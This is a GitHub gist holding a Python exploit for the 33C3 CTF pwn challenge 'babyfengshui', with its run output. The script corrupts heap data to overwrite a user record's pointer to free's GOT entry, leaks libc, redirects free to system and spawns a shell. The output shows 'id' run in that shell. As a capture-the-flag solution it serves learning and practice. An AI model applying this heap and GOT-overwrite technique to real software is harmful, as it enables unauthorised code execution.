Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
33C3 CTF babyfengshui (Pwn 150) / http://katc.hateblo.jp/entry/2016/12/30/164753
from minipwn import *
def add_user(s, size_desc, name, text_len, text):
recvuntil(s, 'Action: ')
sendline(s, '0')
recvuntil(s, 'size of description: ')
sendline(s, str(size_desc))
recvuntil(s, 'name: ')
sendline(s, name)
recvuntil(s, 'text length: ')
sendline(s, str(text_len))
recvuntil(s, 'text: ')
sendline(s, text)
def delete_user(s, index):
recvuntil(s, 'Action: ')
sendline(s, '1')
recvuntil(s, 'index: ')
sendline(s, str(index))
def display_user(s, index):
recvuntil(s, 'Action: ')
sendline(s, '2')
recvuntil(s, 'index: ')
sendline(s, str(index))
recvuntil(s, 'name: ')
name = recvline(s)
recvuntil(s, 'description: ')
desc = recvline(s)
return (name, desc)
def update_user_desc(s, index, text_len, text):
recvuntil(s, 'Action: ')
sendline(s, '3')
recvuntil(s, 'index: ')
sendline(s, str(index))
recvuntil(s, 'text length: ')
sendline(s, str(text_len))
recvuntil(s, 'text: ')
sendline(s, text)
s = connect_process(['./babyfengshui'])
#raw_input()
got_free = 0x804b010
print "[+] allocate user[0], user[1]"
add_user(s, 8, 'AAAAAAAA', 8, 'BBBBBBBB') # index 0
add_user(s, 8, 'CCCCCCCC', 8, 'DDDDDDDD') # index 1
print "[+] free user[0]"
delete_user(s, 0)
print "[+] allocate user[2] and overwrite user[1].ptr_text to got_free"
add_user(s, 0x10, 'E'*0x10, 0x100, '/bin/sh\x00'.ljust(0x98)+p32(got_free)) # index 2
"""
$ nm -D /lib32/libc.so.6 | grep -e free$ -e system$
000705b0 T free
0003a940 W system
"""
name, desc = display_user(s, 1)
libc_free = u32(desc[:4])
print "[+] libc_free = %x" % libc_free
libc_system = libc_free - 0x000705b0 + 0x0003a940
print "[+] libc_system = %x" % libc_system
print "{+] overwrite got_free to libc_system"
update_user_desc(s, 1, 4, p32(libc_system))
print "[+] trigger free(user[2].ptr_text)"
delete_user(s, 2)
print "[+] got a shell!"
interact(s)
$ python babyfengshui.py
[+] allocate user[0], user[1]
[+] free user[0]
[+] allocate user[2] and overwrite user[1].ptr_text to got_free
[+] libc_free = f762e5b0
[+] libc_system = f75f8940
{+] overwrite got_free to libc_system
[+] trigger free(user[2].ptr_text)
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment